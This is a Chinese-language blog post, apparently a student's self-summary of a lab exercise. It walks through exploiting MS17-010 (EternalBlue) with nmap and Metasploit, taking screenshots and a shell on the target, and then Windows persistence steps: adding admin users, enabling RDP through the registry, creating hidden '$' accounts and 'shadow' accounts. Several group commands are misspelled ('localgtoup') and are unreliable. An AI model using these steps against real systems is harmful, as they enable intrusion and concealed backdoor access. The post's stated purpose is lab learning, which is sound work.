永恒之蓝 (MS17-010)和电脑用户的增减

0 阅读2分钟

第三篇学习成果的自我总结:

写得不好或错误的,请指出来。心甘情愿的接受不好的一面

QQ20260313-204012.png

强调:发表的内容只能在靶机上进行。不能运用在别人的物理机上运行!不能运用在别人的物理机上运行!不能运用在别人的物理机上运行!攻击工具是kali

永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。永恒之蓝是在 Windows 的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。

1773406175923.png 扫描目标主机是否存在该漏洞

nmap -sV -p445 --script=smb-vuln-ms17-010 192.168.20.142

  •  -nmap :开源网络扫描工具,用于探测主机、端口、服务及漏洞

  •  -sV :探测端口对应的服务版本,确认SMB协议具体版本(漏洞仅影响SMBv1)

  •  -p445 :指定仅扫描445端口,SMB协议现代默认通信端口

  •  --script=smb-vuln-ms17-010 :加载nmap专属漏洞检测脚本,专门验证MS17-010永恒之蓝漏洞是否存在

image.png

image.png 说明:进入msfconsole程序是最后出现msf6

第二步是search ms17-010 查找MS17-010模块

image.png

image.png

第三步:利用模块(use 0)

第四步:set rhosts 攻击的ip 建立目标主机

image.png

第五步:run发起攻击

监控目标主机run vnc

image.png 说明:ctrl + c是停止攻击

截取目标主机的屏幕界面,就是截屏:

image.png

shell就能得到目标主机的命令提示窗口,出现乱码就输入chcp 65001

权限:

system:系统本身,最高权限

administrator:管理员用户

guest:客人,只能参观,没有管理

标准用户:没有管理权,相当于牛马

administrators:管理员组

查看用户:net user

删除用户:net user 用户名 /del

添加用户:net user 用户名 密码 /add

查看详细用户:net user 用户名

查看自己是谁:whoami

win+r:mstsc是打开远程桌面连接,远程登陆(rdp)

打开远程连接:reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /vfDenyTSConnections /t REG_DWORD /d 0 /f

将用户添加组:net localgtoup administrators(组名) 用户名 /add

在任务栏按搜索:输入uac是用户账户控制设置,从下往上是高到低等级,更改要重启才成功

查看组名:net localgtoup

删除组:net localgtoup 组名 /del

隐藏用户:net user 用户名$ 密码 /add 只是在net user里看不到

影子用户:一个用户的密码,另一个用户的权限。过程:将用的用户名与权限导出,还有 要用的权限导出来,权限里的内容是f的数据,替换就行了删了要用的用户